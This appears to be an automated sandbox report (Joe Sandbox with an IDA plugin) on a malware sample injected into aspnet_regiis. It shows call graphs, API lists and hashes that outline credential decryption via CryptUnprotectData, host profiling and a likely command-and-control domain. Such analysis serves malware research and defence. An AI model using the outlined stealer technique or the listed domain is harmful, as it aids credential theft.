                                                                                              execution_graph 13555 72c83bc0 13556 72c83bd1 13555->13556 13557 72c83d4e 13556->13557 13565 72c80be0 LdrInitializeThunk 13556->13565 13558 72c83f90 13557->13558 13566 72c7f1d0 13557->13566 13562 72c83de9 13564 72c83ebe 13562->13564 13569 72c80be0 LdrInitializeThunk 13562->13569 13570 72c7f1f0 13564->13570 13565->13557 13574 72c823b0 13566->13574 13568 72c7f1da RtlAllocateHeap 13568->13562 13569->13564 13571 72c7f214 13570->13571 13572 72c7f203 13570->13572 13571->13558 13573 72c7f208 RtlFreeHeap 13572->13573 13573->13571 13575 72c823c0 13574->13575 13575->13568 13575->13575 13738 72c80b80 13739 72c80b98 13738->13739 13740 72c80bba 13738->13740 13741 72c80bc5 13738->13741 13742 72c80ba6 13738->13742 13739->13741 13739->13742 13743 72c7f1d0 RtlAllocateHeap 13740->13743 13744 72c7f1f0 RtlFreeHeap 13741->13744 13745 72c80bab RtlReAllocateHeap 13742->13745 13746 72c80bc0 13743->13746 13744->13746 13745->13746 13581 72c7084b 13582 72c7085b 13581->13582 13583 72c709fb GetComputerNameExA 13582->13583 13752 72c73f97 CoSetProxyBlanket 13753 72c4e594 13754 72c4e60e 13753->13754 13755 72c4e5f1 13753->13755 13755->13754 13757 72c80be0 LdrInitializeThunk 13755->13757 13757->13754 13584 72c48850 13586 72c4885f 13584->13586 13585 72c48b97 ExitProcess 13586->13585 13587 72c48874 GetCurrentProcessId GetCurrentThreadId 13586->13587 13595 72c48b80 13586->13595 13589 72c4889e SHGetSpecialFolderPathW GetForegroundWindow 13587->13589 13590 72c4889a 13587->13590 13591 72c48956 13589->13591 13590->13589 13592 72c7f1d0 RtlAllocateHeap 13591->13592 13593 72c48afa 13592->13593 13598 72c49d00 13593->13598 13602 72c80b60 13595->13602 13596 72c48b6f 13596->13595 13597 72c4b940 FreeLibrary FreeLibrary 13596->13597 13597->13595 13599 72c49d40 13598->13599 13599->13599 13600 72c49dd7 LoadLibraryExW 13599->13600 13601 72c49dec 13600->13601 13605 72c82390 13602->13605 13604 72c80b65 FreeLibrary 13604->13585 13606 72c82399 13605->13606 13606->13604 13607 72c7a4d2 13611 72c827b0 13607->13611 13609 72c7a4ea GetUserDefaultUILanguage 13610 72c7a519 13609->13610 13612 72c82460 13611->13612 13612->13609 13758 72c61090 13759 72c610a4 13758->13759 13763 72c611b1 13758->13763 13759->13759 13764 72c611d0 13759->13764 13761 72c6118c 13762 72c5f790 RtlAllocateHeap RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 13761->13762 13761->13763 13762->13763 13766 72c611e0 13764->13766 13765 72c84270 LdrInitializeThunk 13767 72c612ef 13765->13767 13766->13765 13766->13766 13613 72c7bdd0 13614 72c7be10 13613->13614 13614->13614 13615 72c7c1a3 CoCreateInstance 13614->13615 13616 72c7c7a1 13615->13616 13617 72c7c1fb SysAllocString 13615->13617 13618 72c7c7b1 GetVolumeInformationW 13616->13618 13620 72c7c2a3 13617->13620 13628 72c7c7d3 13618->13628 13621 72c7c790 SysFreeString 13620->13621 13622 72c7c2ab CoSetProxyBlanket 13620->13622 13621->13616 13623 72c7c786 13622->13623 13624 72c7c2cb SysAllocString 13622->13624 13623->13621 13626 72c7c3c0 13624->13626 13626->13626 13627 72c7c3fe SysAllocString 13626->13627 13631 72c7c429 13627->13631 13629 72c7c770 SysFreeString SysFreeString 13629->13623 13630 72c7c766 13630->13629 13631->13629 13631->13630 13632 72c7c46d VariantInit 13631->13632 13634 72c7c4f0 13632->13634 13633 72c7c755 VariantClear 13633->13630 13634->13633 13635 72c4cf53 13636 72c4cf5b 13635->13636 13637 72c4cf5f 13636->13637 13638 72c4cee8 CoInitializeEx 13636->13638 13637->13637 13638->13635 13639 72c84450 13640 72c8448f 13639->13640 13641 72c84469 13639->13641 13641->13640 13645 72c80be0 LdrInitializeThunk 13641->13645 13643 72c844b8 13643->13640 13646 72c80be0 LdrInitializeThunk 13643->13646 13645->13643 13646->13640 13768 72c81092 13769 72c8109c 13768->13769 13772 72c811de 13769->13772 13775 72c80be0 LdrInitializeThunk 13769->13775 13771 72c8132e 13772->13771 13774 72c80be0 LdrInitializeThunk 13772->13774 13774->13771 13775->13772 13648 72c58664 13649 72c58670 13648->13649 13650 72c58810 CryptUnprotectData 13649->13650 13651 72c5883a 13650->13651 13651->13651 13776 72c6f4a4 13777 72c6f4d0 13776->13777 13777->13777 13778 72c6f5ba GetPhysicallyInstalledSystemMemory 13777->13778 13779 72c6f600 13778->13779 13779->13779 13652 72c77363 13653 72c77368 13652->13653 13654 72c7739e GetSystemMetrics GetSystemMetrics 13653->13654 13655 72c773dd 13654->13655 13656 72c657e1 13657 72c657e8 13656->13657 13658 72c657f8 RtlExpandEnvironmentStrings 13657->13658 13659 72c65838 13658->13659 13661 72c65820 13658->13661 13659->13659 13665 72c84270 13659->13665 13662 72c65954 13662->13661 13662->13662 13663 72c65ab1 GetLogicalDrives 13662->13663 13664 72c84270 LdrInitializeThunk 13663->13664 13664->13661 13666 72c84290 13665->13666 13667 72c8436e 13666->13667 13669 72c80be0 LdrInitializeThunk 13666->13669 13667->13662 13669->13667 13780 72c7f220 13781 72c7f242 13780->13781 13782 72c7f25e 13780->13782 13781->13782 13790 72c80be0 LdrInitializeThunk 13781->13790 13783 72c7f433 13782->13783 13785 72c7f1d0 RtlAllocateHeap 13782->13785 13787 72c7f300 13785->13787 13786 72c7f1f0 RtlFreeHeap 13786->13783 13789 72c7f33f 13787->13789 13791 72c80be0 LdrInitializeThunk 13787->13791 13789->13786 13790->13782 13791->13789 13670 72c81563 13671 72c81590 13670->13671 13673 72c8162e 13671->13673 13674 72c80be0 LdrInitializeThunk 13671->13674 13674->13673 13792 72c6f9b6 13794 72c6f9e0 13792->13794 13793 72c6faae 13794->13793 13796 72c80be0 LdrInitializeThunk 13794->13796 13796->13793 13797 72c6f136 13798 72c6f14c GetComputerNameExA 13797->13798 13675 72c4d972 13681 72c497a0 13675->13681 13677 72c4d97a CoUninitialize 13678 72c4d9b0 13677->13678 13679 72c4dd1c CoUninitialize 13678->13679 13680 72c4dd50 13679->13680 13682 72c497b4 13681->13682 13682->13677 13800 72c8183e GetForegroundWindow 13801 72c8185b 13800->13801 13683 72c4e773 13685 72c4e783 13683->13685 13686 72c4e7a4 13683->13686 13684 72c4e85e 13705 72c65680 13684->13705 13685->13686 13709 72c80be0 LdrInitializeThunk 13685->13709 13686->13684 13710 72c80be0 LdrInitializeThunk 13686->13710 13690 72c4e896 13691 72c65da0 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 13690->13691 13692 72c4e8b2 13691->13692 13693 72c660b0 RtlExpandEnvironmentStrings RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 13692->13693 13694 72c4e8ce 13693->13694 13695 72c68780 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 13694->13695 13696 72c4e8f3 13695->13696 13697 72c68b70 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 13696->13697 13698 72c4e8fc 13697->13698 13699 72c6b730 RtlExpandEnvironmentStrings 13698->13699 13700 72c4e905 13699->13700 13701 72c6a790 RtlExpandEnvironmentStrings 13700->13701 13702 72c4e921 13701->13702 13703 72c76f60 6 API calls 13702->13703 13704 72c4e946 13703->13704 13706 72c656e0 13705->13706 13706->13706 13707 72c6570d RtlExpandEnvironmentStrings 13706->13707 13708 72c65770 13707->13708 13708->13708 13709->13686 13710->13684 13711 72c6e5fe 13712 72c704d2 13711->13712 13715 72c7bb80 13712->13715 13716 72c7bba8 13715->13716 13719 72c7bc35 13716->13719 13724 72c80be0 LdrInitializeThunk 13716->13724 13717 72c704e7 13719->13717 13722 72c7bcc7 13719->13722 13723 72c80be0 LdrInitializeThunk 13719->13723 13722->13717 13725 72c80be0 LdrInitializeThunk 13722->13725 13723->13719 13724->13716 13725->13722 13726 72c57ef9 13727 72c57f06 13726->13727 13727->13727 13728 72c84270 LdrInitializeThunk 13727->13728 13729 72c580ba 13728->13729 13729->13729 13730 72c84270 LdrInitializeThunk 13729->13730 13731 72c58289 13730->13731 13732 72c4cf79 CoInitializeSecurity 13733 72c80e77 13734 72c80e86 13733->13734 13736 72c80e9e 13733->13736 13734->13736 13737 72c80be0 LdrInitializeThunk 13734->13737 13737->13736

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 72c7bdd0-72c7be01 1 72c7be10-72c7be24 0->1 1->1 2 72c7be26-72c7be4b 1->2 3 72c7be50-72c7be83 2->3 3->3 4 72c7be85-72c7bedf 3->4 5 72c7bee0-72c7bf0a 4->5 5->5 6 72c7bf0c-72c7bf31 5->6 8 72c7bf37-72c7bf57 6->8 9 72c7c006-72c7c017 6->9 11 72c7bf60-72c7bf90 8->11 10 72c7c020-72c7c03e 9->10 10->10 12 72c7c040-72c7c0b1 10->12 11->11 13 72c7bf92-72c7bfae 11->13 15 72c7c0c0-72c7c109 12->15 14 72c7bfb0-72c7bff7 13->14 14->14 16 72c7bff9-72c7bffe 14->16 15->15 17 72c7c10b-72c7c163 15->17 16->9 18 72c7c170-72c7c1a1 17->18 18->18 19 72c7c1a3-72c7c1f5 CoCreateInstance 18->19 20 72c7c7a1-72c7c7d1 call 72c827b0 GetVolumeInformationW 19->20 21 72c7c1fb-72c7c239 19->21 26 72c7c7d3-72c7c7d7 20->26 27 72c7c7db-72c7c7dd 20->27 23 72c7c240-72c7c278 21->23 23->23 25 72c7c27a-72c7c2a5 SysAllocString 23->25 32 72c7c790-72c7c79d SysFreeString 25->32 33 72c7c2ab-72c7c2c5 CoSetProxyBlanket 25->33 26->27 28 72c7c7ed-72c7c7f4 27->28 30 72c7c7f6-72c7c7fd 28->30 31 72c7c800-72c7c827 28->31 30->31 34 72c7c830-72c7c85f 31->34 32->20 35 72c7c786-72c7c78c 33->35 36 72c7c2cb-72c7c2fb 33->36 34->34 38 72c7c861-72c7c8a3 34->38 35->32 37 72c7c300-72c7c325 36->37 37->37 39 72c7c327-72c7c3b6 SysAllocString 37->39 40 72c7c8b0-72c7c8dd 38->40 41 72c7c3c0-72c7c3fc 39->41 40->40 42 72c7c8df-72c7c906 call 72c5db10 40->42 41->41 43 72c7c3fe-72c7c42b SysAllocString 41->43 46 72c7c910-72c7c918 42->46 49 72c7c431-72c7c453 43->49 50 72c7c770-72c7c782 SysFreeString * 2 43->50 46->46 48 72c7c91a-72c7c91c 46->48 51 72c7c922-72c7c932 call 72c481e0 48->51 52 72c7c7e0-72c7c7e7 48->52 57 72c7c766-72c7c76c 49->57 58 72c7c459-72c7c45c 49->58 50->35 51->52 52->28 54 72c7c937-72c7c93e 52->54 57->50 58->57 59 72c7c462-72c7c467 58->59 59->57 60 72c7c46d-72c7c4e1 VariantInit 59->60 61 72c7c4f0-72c7c527 60->61 61->61 62 72c7c529-72c7c542 61->62 63 72c7c546-72c7c54c 62->63 64 72c7c755-72c7c762 VariantClear 63->64 65 72c7c552-72c7c55b 63->65 64->57 65->64 66 72c7c561-72c7c56e 65->66 67 72c7c570-72c7c575 66->67 68 72c7c5bd 66->68 69 72c7c596-72c7c59a 67->69 70 72c7c5bf-72c7c5d9 call 72c48050 68->70 71 72c7c580-72c7c588 69->71 72 72c7c59c-72c7c5a7 69->72 79 72c7c5df-72c7c5e9 70->79 80 72c7c6fe-72c7c70f 70->80 74 72c7c58b-72c7c594 71->74 75 72c7c5b0-72c7c5b6 72->75 76 72c7c5a9-72c7c5ae 72->76 74->69 74->70 75->74 78 72c7c5b8-72c7c5bb 75->78 76->74 78->74 79->80 83 72c7c5ef-72c7c5f7 79->83 81 72c7c716-72c7c729 80->81 82 72c7c711 80->82 85 72c7c730-72c7c752 call 72c48080 call 72c48060 81->85 86 72c7c72b 81->86 82->81 84 72c7c600-72c7c60e 83->84 87 72c7c620-72c7c626 84->87 88 72c7c610-72c7c615 84->88 85->64 86->85 91 72c7c644-72c7c650 87->91 92 72c7c628-72c7c62b 87->92 90 72c7c6b0-72c7c6b4 88->90 98 72c7c6b6-72c7c6bc 90->98 95 72c7c652-72c7c655 91->95 96 72c7c6c8-72c7c6d0 91->96 92->91 94 72c7c62d-72c7c642 92->94 94->90 95->96 99 72c7c657-72c7c6af 95->99 96->98 102 72c7c6d2-72c7c6d5 96->102 98->80 101 72c7c6be-72c7c6c0 98->101 99->90 101->84 103 72c7c6c6 101->103 104 72c7c6d7-72c7c6f8 102->104 105 72c7c6fa-72c7c6fc 102->105 103->80 104->90 105->90
                                                                                              APIs
                                                                                              • CoCreateInstance.OLE32( )*+,00000000,00000001,?,00000000), ref: 72C7C1ED
                                                                                              • SysAllocString.OLEAUT32(F90FFF0C), ref: 72C7C27F
                                                                                              • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 72C7C2BD
                                                                                              • SysAllocString.OLEAUT32(6A84749C), ref: 72C7C32C
                                                                                              • SysAllocString.OLEAUT32(A579AB79), ref: 72C7C403
                                                                                              • VariantInit.OLEAUT32(?), ref: 72C7C475
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                                              • String ID: )*+$?<$Z[$q
                                                                                              • API String ID: 65563702-2964544060
                                                                                              • Opcode ID: f48cf1771c7043562d52b6903692ba75cf5557fed910cf0a769df7ca26dcf347
                                                                                              • Instruction ID: a95220489d47d8e01f02c9a181fc98c0def1f014552a230f9dd8d84c778ffe29
                                                                                              • Opcode Fuzzy Hash: f48cf1771c7043562d52b6903692ba75cf5557fed910cf0a769df7ca26dcf347
                                                                                              • Instruction Fuzzy Hash: BD52ED716083418FD314CF29C88179BBBE1EFE5324F148A2DE9958B391D778D94ACB92

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 106 72c657e1-72c657e6 107 72c657ef 106->107 108 72c657e8-72c657ed 106->108 109 72c657f2-72c65819 call 72c48050 RtlExpandEnvironmentStrings 107->109 108->109 112 72c65820 109->112 113 72c65838-72c65840 109->113 114 72c65828-72c65833 call 72c48060 109->114 112->114 115 72c65842-72c65847 113->115 116 72c65849 113->116 120 72c65d6e-72c65d7a 114->120 118 72c65850-72c658a7 call 72c48050 115->118 116->118 123 72c658b0-72c658e2 118->123 123->123 124 72c658e4-72c658ec 123->124 125 72c65911-72c6591e 124->125 126 72c658ee-72c658f3 124->126 128 72c65920-72c65924 125->128 129 72c65941-72c6595c call 72c84270 125->129 127 72c65900-72c6590f 126->127 127->125 127->127 130 72c65930-72c6593f 128->130 133 72c65963-72c65979 129->133 134 72c65980-72c65988 129->134 135 72c65af0-72c65bb3 129->135 136 72c65aea 129->136 137 72c65ad8-72c65ae2 129->137 130->129 130->130 133->134 133->135 133->136 133->137 138 72c65991 134->138 139 72c6598a-72c6598f 134->139 140 72c65bc0-72c65bdd 135->140 137->136 141 72c65998-72c65a3f call 72c48050 138->141 139->141 140->140 142 72c65bdf-72c65bef call 72c618f0 140->142 147 72c65a40-72c65a54 141->147 146 72c65bf4-72c65bf7 142->146 146->120 147->147 148 72c65a56-72c65a5e 147->148 149 72c65a60-72c65a67 148->149 150 72c65a81-72c65a8e 148->150 151 72c65a70-72c65a7f 149->151 152 72c65a90-72c65a94 150->152 153 72c65ab1-72c65ad1 GetLogicalDrives call 72c84270 150->153 151->150 151->151 154 72c65aa0-72c65aaf 152->154 153->136 153->137 154->153 154->154
                                                                                              APIs
                                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000), ref: 72C6580E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentExpandStrings
                                                                                              • String ID: &@7F$0DEZ$9F7D$A^$BN=L$F$\:$F6V4$O(Z.$O:B8$T0P6$V"V $c.S,$z
                                                                                              • API String ID: 237503144-1791929361
                                                                                              • Opcode ID: 58010ade4ffbb4f1365ee64addf060a9c84999ab061947e34c0274513edf9d76
                                                                                              • Instruction ID: b6ea6fdbe4b29fd86d50a4e32240883fbc86d75321516726b928548e51ee66ab
                                                                                              • Opcode Fuzzy Hash: 58010ade4ffbb4f1365ee64addf060a9c84999ab061947e34c0274513edf9d76
                                                                                              • Instruction Fuzzy Hash: BAA1CCB060C340CFD310CF99C89072BBBF1EF96368F144A2CE6968B280E7798509CB56

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 72C48874
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 72C4887E
                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 72C48933
                                                                                              • GetForegroundWindow.USER32 ref: 72C48948
                                                                                              • ExitProcess.KERNEL32 ref: 72C48B99
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                              • String ID:
                                                                                              • API String ID: 4063528623-0
                                                                                              • Opcode ID: 3dfd7257c8202f62819fc37ebaca6be65c252f88386d344d7f399ee1048e1941
                                                                                              • Instruction ID: 319d11c0538ce15569cc09389716b13af5a54488baf91bdc46a6175bef830d7c
                                                                                              • Opcode Fuzzy Hash: 3dfd7257c8202f62819fc37ebaca6be65c252f88386d344d7f399ee1048e1941
                                                                                              • Instruction Fuzzy Hash: 73816AB3B447140BD308EE6CCC9636BBAD69BC4314F0A963DE949D7390EA788D0987C5

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 256 72c77363-72c77444 call 72c54b70 GetSystemMetrics * 2 264 72c7744b-72c774dc 256->264
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: MetricsSystem
                                                                                              • String ID:
                                                                                              • API String ID: 4116985748-3916222277
                                                                                              • Opcode ID: ffa7a5bd33c74e1848df7d65fdddfa1c220f03f8f2609bb852b41cc239ccdede
                                                                                              • Instruction ID: ef86d8f0c7b6e6aeaac2b0e407cc4678be36a8b0f669ddf244d322046e16b5ad
                                                                                              • Opcode Fuzzy Hash: ffa7a5bd33c74e1848df7d65fdddfa1c220f03f8f2609bb852b41cc239ccdede
                                                                                              • Instruction Fuzzy Hash: CA51A5B5D142589FDB40EFADD981A9DBBF0BB48300F10852DE498E7350E734A949CF92

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 288 72c4d972-72c4d9a6 call 72c497a0 CoUninitialize 291 72c4d9b0-72c4d9ed 288->291 291->291 292 72c4d9ef-72c4da1b 291->292 293 72c4da20-72c4da49 292->293 293->293 294 72c4da4b-72c4daa9 293->294 295 72c4dab0-72c4dad9 294->295 295->295 296 72c4dadb-72c4dae3 295->296 297 72c4dae5-72c4daef 296->297 298 72c4dafb-72c4db03 296->298 299 72c4daf0-72c4daf9 297->299 300 72c4db05-72c4db06 298->300 301 72c4db1b-72c4db26 298->301 299->298 299->299 302 72c4db10-72c4db19 300->302 303 72c4db3d 301->303 304 72c4db28-72c4db2f 301->304 302->301 302->302 306 72c4db40-72c4db48 303->306 305 72c4db30-72c4db39 304->305 305->305 309 72c4db3b 305->309 307 72c4db5d 306->307 308 72c4db4a-72c4db4f 306->308 311 72c4db60-72c4db68 307->311 310 72c4db50-72c4db59 308->310 309->306 310->310 312 72c4db5b 310->312 313 72c4db6a-72c4db6f 311->313 314 72c4db7b-72c4db87 311->314 312->311 315 72c4db70-72c4db79 313->315 316 72c4dba1-72c4dc66 314->316 317 72c4db89-72c4db8b 314->317 315->314 315->315 319 72c4dc70-72c4dcb3 316->319 318 72c4db90-72c4db9d 317->318 318->318 320 72c4db9f 318->320 319->319 321 72c4dcb5-72c4dcdf 319->321 320->316 322 72c4dce0-72c4dcf2 321->322 322->322 323 72c4dcf4-72c4dd45 call 72c4b970 call 72c497a0 CoUninitialize 322->323 328 72c4dd50-72c4dd8d 323->328 328->328 329 72c4dd8f-72c4ddbf 328->329 330 72c4ddc0-72c4dde9 329->330 330->330 331 72c4ddeb-72c4de49 330->331 332 72c4de50-72c4de79 331->332 332->332 333 72c4de7b-72c4de83 332->333 334 72c4de85-72c4de8f 333->334 335 72c4de9b-72c4dea3 333->335 336 72c4de90-72c4de99 334->336 337 72c4dea5-72c4dea6 335->337 338 72c4debb-72c4dec6 335->338 336->335 336->336 341 72c4deb0-72c4deb9 337->341 339 72c4dedd 338->339 340 72c4dec8-72c4decf 338->340 343 72c4dee0-72c4dee8 339->343 342 72c4ded0-72c4ded9 340->342 341->338 341->341 342->342 344 72c4dedb 342->344 345 72c4defd 343->345 346 72c4deea-72c4deef 343->346 344->343 348 72c4df00-72c4df08 345->348 347 72c4def0-72c4def9 346->347 347->347 349 72c4defb 347->349 350 72c4df0a-72c4df0f 348->350 351 72c4df1b-72c4df27 348->351 349->348 352 72c4df10-72c4df19 350->352 353 72c4df41-72c4e006 351->353 354 72c4df29-72c4df2b 351->354 352->351 352->352 355 72c4e010-72c4e053 353->355 356 72c4df30-72c4df3d 354->356 355->355 357 72c4e055-72c4e07f 355->357 356->356 358 72c4df3f 356->358 359 72c4e080-72c4e092 357->359 358->353 359->359 360 72c4e094-72c4e0ca call 72c4b970 359->360
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: Uninitialize
                                                                                              • String ID: cureprouderio.click
                                                                                              • API String ID: 3861434553-2925096321
                                                                                              • Opcode ID: 0cc147bbae4835260eee6e499006a2a9b769570ffb55b32c7933ea8e8af8033f
                                                                                              • Instruction ID: 0f32f011c095f31a7907f82de06f5b31f83c73e10b501efeba5b50b6d00e6c0d
                                                                                              • Opcode Fuzzy Hash: 0cc147bbae4835260eee6e499006a2a9b769570ffb55b32c7933ea8e8af8033f
                                                                                              • Instruction Fuzzy Hash: FE22BFB55047818FD756CF2AC4A0712BFB2BFA6304F18D68CC8864F74AD775A406CB91

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 363 72c6f4a4-72c6f4cf 364 72c6f4d0-72c6f4ec 363->364 364->364 365 72c6f4ee-72c6f4f3 364->365 366 72c6f4f5-72c6f4f6 365->366 367 72c6f50b-72c6f52e 365->367 368 72c6f500-72c6f509 366->368 370 72c6f530-72c6f54c 367->370 368->367 368->368 370->370 371 72c6f54e-72c6f553 370->371 372 72c6f555-72c6f556 371->372 373 72c6f56b-72c6f577 371->373 374 72c6f560-72c6f569 372->374 375 72c6f591-72c6f5ff call 72c827b0 GetPhysicallyInstalledSystemMemory 373->375 376 72c6f579-72c6f57b 373->376 374->373 374->374 381 72c6f600-72c6f67b 375->381 377 72c6f580-72c6f58d 376->377 377->377 379 72c6f58f 377->379 379->375 381->381 382 72c6f67d-72c6f6cf call 72c5db10 381->382 385 72c6f6d0-72c6f6f8 382->385 385->385 386 72c6f6fa-72c6f6ff 385->386 387 72c6f701-72c6f708 386->387 388 72c6f75b-72c6f75e 386->388 389 72c6f710-72c6f719 387->389 390 72c6f761-72c6f76b 388->390 389->389 393 72c6f71b 389->393 391 72c6f76d-72c6f76f 390->391 392 72c6f77b-72c6f783 390->392 394 72c6f770-72c6f779 391->394 395 72c6f785-72c6f786 392->395 396 72c6f79b-72c6f7f4 392->396 393->390 394->392 394->394 397 72c6f790-72c6f799 395->397 398 72c6f800-72c6f882 396->398 397->396 397->397 398->398 399 72c6f888-72c6f88d 398->399 400 72c6f88f-72c6f896 399->400 401 72c6f8ad-72c6f8b0 399->401 402 72c6f8a0-72c6f8a9 400->402 403 72c6f8b3-72c6f8bb 401->403 402->402 404 72c6f8ab 402->404 405 72c6f8bd-72c6f8bf 403->405 406 72c6f8cb-72c6f943 403->406 404->403 407 72c6f8c0-72c6f8c9 405->407 407->406 407->407
                                                                                              APIs
                                                                                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 72C6F5BE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770867887.0000000072C88000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770885602.0000000072C96000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_72c40000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID: InstalledMemoryPhysicallySystem
                                                                                              • String ID: M//G
                                                                                              • API String ID: 3960555810-2173678207
                                                                                              • Opcode ID: 34b37ac74345e404d4fe419bf0f8290b4872bc19ff5e52ecc57790f780b7485a
                                                                                              • Instruction ID: ce60a50dfb09c96f2764027de4f4798c9097d8f40b6f5b08443b70fe813fee89
                                                                                              • Opcode Fuzzy Hash: 34b37ac74345e404d4fe419bf0f8290b4872bc19ff5e52ecc57790f780b7485a
                                                                                              • Instruction Fuzzy Hash: FBD18E711047828FD715CF29C4A1766FBE1FFA6304F2885AEC4DA8B792D779A406CB50
                                                                                              APIs
                                                                                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 72C6F5BE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1770821380.0000000072C41000.00000020.00000400.00020000.00000000.sdmp, Offset: 72C40000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1770807596.0000000072C40000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1770853038.0000000072C85000.00000002.00000400.00020000.00000000.sdmpDownload File
